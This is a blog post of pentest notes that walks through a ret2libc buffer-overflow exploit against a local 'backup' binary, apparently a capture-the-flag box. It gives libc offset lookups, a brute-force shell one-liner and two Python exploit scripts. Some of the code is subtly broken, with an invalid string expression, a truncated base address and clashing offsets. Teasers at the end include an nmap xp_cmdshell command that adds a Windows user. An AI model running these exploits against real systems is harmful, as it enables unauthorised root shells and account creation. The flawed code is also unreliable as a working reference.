Skip to main content

Buffer Over Flow Exploitation

By 
Check if there is a Buffer Over Flow Vuln:

ldd /usr/bin/filename | grep libc

libc.so.6 => /lib32/libc.so.6 (0xf75df000)
Get The value of System:
readelf -s /lib32/libc.so.6 | grep system

   245: 00110820    68 FUNC   svcerr_systemerr@@GLIBC_2.0
   627: 0003a940    55 FUNC   _libc_system@@GLIBC_PRIVATE
  1457: 0003a940    55 FUNC   system@@GLIBC_2.0

we need the value of system@@GLIBC_2.0 "0003a940"
 Get The value of Exit:
readelf -s /lib32/libc.so.6 | grep exit
2263: 0002e7d0    78 FUNC   on_exit@@GLIBC_2.0
Get The value of /bin/sh in libc:
strings -a -t x /lib32/libc.so.6 | grep /bin/sh

 15900b /bin/sh


while true; do /usr/local/bin/backup -i $(python -c 'print "A" * 512 + "\x40\xa9\x03\x00\xb0\xe7\x02\x00\x0b\x90\x15\x00"'); done  
 IPPSEC Buffer Overflow Exploit Code:


from subprocess import call
import struct 

libc_base_addr = 0xf75b000

system_off=0x0003a940          #system offset
exit_off=0x0002e7d0   #exit offset 
arg_off=0x00015900   #bin/bash offset

system_addr = struct.pack("<I", libc_base_addr+system_off)
exit_addr= struct.pack("<I",libc_base_addr+exit_off)
arg_addr = struct.pack("<I",libc_base_addr+arg_off)

buf = "A" +512
buf += system_addr
buf += exit_addr
buf += arg_addr

i = 0
while (i < 512):
 print "Try %s" %i
 i +=1
 ret = call(["/usr/local/bin/backup", buf])

Exploit:

import struct
from subprocess import call

libc_base_addr = 0xf7542000
system_off = 0x0003a940            
exit_off = 0x0002e7b0          
system_addr = libc_base_addr + system_off
exit_addr = libc_base_addr + exit_off
system_arg = libc_base_addr + 0x0015900b

def conv(num):
    return struct.pack("<I",num)

buf = "A" * 512
buf += conv(system_addr)
buf += conv(exit_addr)
buf += conv(system_arg)

print "Calling vulnerable program"

i = 0
while (i < 255):
    print "Number of tries: %d" %i
    i += 1

    ret = call(["/usr/local/bin/backup", "-i", "3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110", buf])
    if (not ret):
        break
    else:
        print "Exploit failed"
Labels:

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds...
Post a Comment
Read more

Host and Application locally and access it over the internet via ngrock

By
 ngrock creates a tunnel from your local machine to ngrock server and host it on the internet via their HTTPS url  Resister an account on ngrock and login #Download the client curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok #add the authToken ngrok config add-authtoken 2p7Oc #start a python server on your application python -m http.server 3000 #start the server - use the same port as the python server (3000 in below example) ngrok http http://localhost:3000 --request-header-add "ngrok-skip-browser-warning: true" Setting up a Request Header - Login to the application --> Univeral Gateway --> Edges - Create an Edge --> Request Headers --> `ngrok-skip-browser-warning :12 - go back to overv...
Post a Comment
Read more

Cloud Pentest Cheatsheet - Azure

By
Azure Cloud offers a comprehensive ecosystem of tools and services. Among its core components are: Azure Active Directory (AAD) Azure Resource Manager (ARM) Office 365 (O365) Initial Access Try to get a user credential via OSINT/Social engineering or try to comprise a web application hosted on Azure VM. Enumerate the roles attached to the VM and try to escalate your privileges.  Entra ID Directory Role Entra ID directory roles are predefined roles that grant permissions to perform specific tasks within an Azure AD tenant. These roles are essential for managing administrative tasks in Entra ID. Types of Roles: Built-in Directory Roles Global Administrator Application Administrator User Administrator Custom Directory Roles Accessing APIs in Azure Entra ID - Access via Microsoft Graph API Endpoint {HTTP method} https://graph.microsoft.com/{version}/{resource}?{query-parameters} Azure Resource Manager API Endpoint (ARM-specific) {HTTP method} https://management.azure.com/{...
Post a Comment
Read more